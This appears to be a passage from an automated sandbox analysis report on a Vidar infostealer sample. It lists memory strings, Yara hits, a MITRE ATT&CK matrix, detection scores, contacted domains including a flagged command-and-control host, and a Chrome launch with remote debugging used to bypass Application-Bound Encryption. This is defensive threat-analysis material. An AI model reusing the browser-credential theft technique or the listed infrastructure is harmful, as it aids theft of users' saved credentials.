Source: Vibrators.com.2.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Vibrators.com	Binary or memory string: WIN_XPe
Source: Vibrators.com	Binary or memory string: WIN_VISTA
Source: Vibrators.com	Binary or memory string: WIN_7
Source: Vibrators.com	Binary or memory string: WIN_8

Source: Yara match	File source: 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vibrators.com PID: 7852, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 11.2.Vibrators.com.39b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000003.1708990346.00000000039BA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1708846807.0000000000F23000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2507233828.00000000039B1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504350523.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2504454906.0000000000FB8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vibrators.com PID: 7852, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A72263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		11_2_00A72263
Source: C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	Code function: 11_2_00A71C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		11_2_00A71C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 Registry Run Keys / Startup Folder	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	1 DLL Side-Loading	NTDS	37 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 Extra Window Memory Injection	LSA Secrets	11 Query Registry	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	111 Masquerading	Cached Domain Credentials	241 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	13 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	13 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
QIo3SytSZA.exe	32%	ReversingLabs	Win32.Trojan.Znyonm
QIo3SytSZA.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\415434\Vibrators.com	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
https://hulkpara.xyz/	100%	Avira URL Cloud	malware
https://t.m	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.165.220.57	true	false	high
www.google.com	142.250.181.132	true	false	high
hulkpara.xyz	94.130.191.168	true	true	unknown
googlehosted.l.googleusercontent.com	142.250.181.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
oNDvJHpUYYRpVDcYWEDspYa.oNDvJHpUYYRpVDcYWEDspYa	unknown	unknown	false	unknown
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1734552582370&w=0&anoncknm=app_anon&NoResponseBody=true	false		high
https://hulkpara.xyz/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	false		high
https://duckduckgo.com/ac/?q=	Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	false		high
https://google-ohttp-relay-join.fastly-edge.com//	chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/2	chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/1	chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ntp.msn.com/_default	QuotaManager.27.dr	false		high
http://anglebug.com/4633	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/4	chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/;	chrome.exe, 0000000F.00000003.1950229118.000016CC01660000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956174370.000016CC01660000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/:	chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://google-ohttp-relay-join.fastly-edge.com/8	chrome.exe, 0000000F.00000003.1954342410.000016CC01C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1954456634.000016CC01C8C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://deff.nelreports.net/api/report?cat=msn	2cc80dabc69f58b6_0.27.dr, Reporting and NEL.28.dr	false		high
https://crbug.com/368855.)	chrome.exe, 0000000F.00000003.1927203972.000016CC002A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.gcp.privacysandboxservices.com	chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929298627.000016CC00EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930980907.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931013682.000016CC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929227613.000016CC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930948477.000016CC00700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930921170.000016CC00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929389811.000016CC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929084913.000016CC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929271097.000016CC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	manifest.json.27.dr	false		high
https://publickeyservice.pa.aws.privacysandboxservices.com	chrome.exe, 0000000F.00000003.1951359134.000016CC01670000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://anglebug.com/7714	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.instagram.com	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://www.google.com/speech-api/v2/synthesize?	chrome.exe, 0000000F.00000003.1927203972.000016CC002A8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696495411400900000.1&ci=1696495411208.12791&cta	Vibrators.com, 0000000B.00000002.2508933737.000000000615F000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505005731.000000000372E000.00000004.00000800.00020000.00000000.sdmp, P8QIEK.11.dr	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 0000000F.00000003.1966375334.000016CC01F20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1965992834.000016CC01F64000.00000004.00000800.00020000.00000000.sdmp	false		high
https://outlook.live.com/mail/inbox?isExtension=true&sharedHeader=1&nlp=1&client_flight=outlookedge	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://outlook.office.com/mail/compose?isExtension=true	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
http://anglebug.com/6929	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://i.y.qq.com/n2/m/index.html	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://www.deezer.com/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://www.youtube.com/?feature=ytca	chrome.exe, 0000000F.00000003.1943483741.000016CC0157C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://web.telegram.org/	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153191869.0000104000394000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	chrome.exe, 0000000F.00000003.1914593476.000016CC00CC0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000002.2060166432.00007B600016C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000002.2207568613.000010400016C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://notepad-plus-plus.org/0	QIo3SytSZA.exe	false		high
https://cdnjs.cloudflare.com/ajax/libs/mathjax/	offscreendocument_main.js.27.dr, service_worker_bin_prod.js.27.dr	false		high
https://drive-daily-2.corp.google.com/	manifest.json.27.dr	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 0000000F.00000003.1931234222.000016CC00314000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929298627.000016CC00EC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930980907.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931013682.000016CC00F4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929227613.000016CC0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930948477.000016CC00700000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1930921170.000016CC00494000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929389811.000016CC01038000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929084913.000016CC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1929271097.000016CC0106C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931501095.000016CC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1931406710.000016CC01134000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview	chrome.exe, 0000000F.00000003.1956879536.000016CC01788000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1956993954.000016CC0179C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Vibrators.com, 0000000B.00000002.2508933737.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, Web Data.27.dr, ZU3O8G.11.dr, CBASRI.11.dr	false		high
https://t.me/k04aelm0nk3Mozilla/5.0	Vibrators.com, 0000000B.00000003.1708781553.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Vibrators.com, 0000000B.00000000.1420068916.0000000000AC5000.00000002.00000001.01000000.00000007.sdmp, Wife.0.dr, Vibrators.com.2.dr	false		high
https://issuetracker.google.com/161903006	msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Vibrators.com, 0000000B.00000002.2505874064.00000000038BF000.00000004.00000800.00020000.00000000.sdmp, CBASRI.11.dr	false		high
https://drive-daily-1.corp.google.com/	manifest.json.27.dr	false		high
https://excel.new?from=EdgeM365Shoreline	25bbe0ec-fcbc-404a-8cf2-e47e1ef7316c.tmp.27.dr	false		high
https://drive-daily-5.corp.google.com/	manifest.json.27.dr	false		high
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000015.00000003.2043254973.00007B6000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043093243.00007B6000268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153048096.000010400026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2152912348.0000104000264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 0000000F.00000003.1927799105.000016CC00E94000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000F.00000003.1927765016.000016CC003D8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2043450200.00007B6000394000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000015.00000003.2045367630.00007B6000380000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000019.00000003.2153772107.0000104000454000.00000004.00000800.00020000.00000000.sdmp	false		high
